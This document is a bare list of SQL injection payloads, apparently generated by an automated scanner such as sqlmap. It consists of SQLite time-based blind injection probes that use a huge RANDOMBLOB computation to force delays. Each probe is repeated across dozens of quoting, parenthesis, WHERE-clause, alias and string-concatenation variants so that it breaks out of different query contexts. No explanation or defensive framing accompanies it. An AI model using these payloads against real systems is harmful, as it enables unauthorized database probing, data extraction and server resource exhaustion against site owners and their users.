'''.)..'..
'cwfd<'">HXOR
) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))
') AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))
' AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))
" AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))
) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND (3895=3895
)) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ((6039=6039
))) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND (((9884=9884
 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))
') AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ('ANix'='ANix
')) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND (('pfuf'='pfuf
'))) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ((('MBMH'='MBMH
' AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND 'oAwE'='oAwE
') AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ('SAvi' LIKE 'SAvi
')) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND (('PcaQ' LIKE 'PcaQ
'))) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ((('VJnB' LIKE 'VJnB
' AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND 'CYVj' LIKE 'CYVj
") AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ("uvSb"="uvSb
")) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND (("GvEq"="GvEq
"))) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ((("nVzA"="nVzA
" AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND "QeqJ"="QeqJ
") AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ("elbB" LIKE "elbB
")) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND (("SPay" LIKE "SPay
"))) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ((("VkCb" LIKE "VkCb
" AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND "jETH" LIKE "jETH
%') AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ('%'='
%')) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND (('%'='
%'))) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ((('%'='
%' AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND '%'='
%") AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ("%"="
%")) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND (("%"="
%"))) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ((("%"="
%" AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND "%"="
%00') AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ('BQTq'='BQTq
%00')) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND (('crIu'='crIu
%00'))) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND ((('Lyew'='Lyew
%00' AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))) AND 'naZt'='naZt
 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- jepd
 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))# aoPb
') WHERE 5402=5402 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
") WHERE 4443=4443 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
) WHERE 3090=3090 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
' WHERE 2300=2300 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
" WHERE 1936=1936 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
 WHERE 6454=6454 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
')) AS lnDY WHERE 7601=7601 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
")) AS gboF WHERE 3874=3874 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
)) AS ILMO WHERE 4512=4512 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
') AS zPqN WHERE 7274=7274 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
") AS FtZd WHERE 4577=4577 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
) AS PXzQ WHERE 2972=2972 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))-- 
'||(SELECT 'qcve' FROM DUAL WHERE 8415=8415 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))))||'
'||(SELECT 'eXnv' WHERE 7198=7198 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))))||'
'+(SELECT qrSo WHERE 7168=7168 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))))+'
'+(SELECT 'YoRa' WHERE 4083=4083 AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))))+'
' IN BOOLEAN MODE) AND 7266=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))#
) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
') AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
' AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
" AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
)) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
))) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
')) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
'))) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
") AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
")) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
"))) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%') AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%')) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%'))) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%' AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%") AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%")) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%"))) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%" AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%00') AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%00')) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%00'))) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
%00' AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
') WHERE 2007=2007 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
") WHERE 6968=6968 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
) WHERE 3084=3084 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
' WHERE 1368=1368 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
" WHERE 8558=8558 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
 WHERE 2673=2673 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
')) AS pGVl WHERE 8733=8733 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
")) AS VJvC WHERE 6071=6071 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
)) AS wBcZ WHERE 1997=1997 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
') AS gReb WHERE 3877=3877 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
") AS anop WHERE 1046=1046 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
) AS fTDq WHERE 5724=5724 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
'||(SELECT 'ZHtS' FROM DUAL WHERE 5564=5564 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
'||(SELECT 'romC' WHERE 9161=9161 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
'+(SELECT fbQv WHERE 2467=2467 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
'+(SELECT 'kzVw' WHERE 8847=8847 AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
' IN BOOLEAN MODE) AND 6350=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2))))--
(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1500000000/2)))))
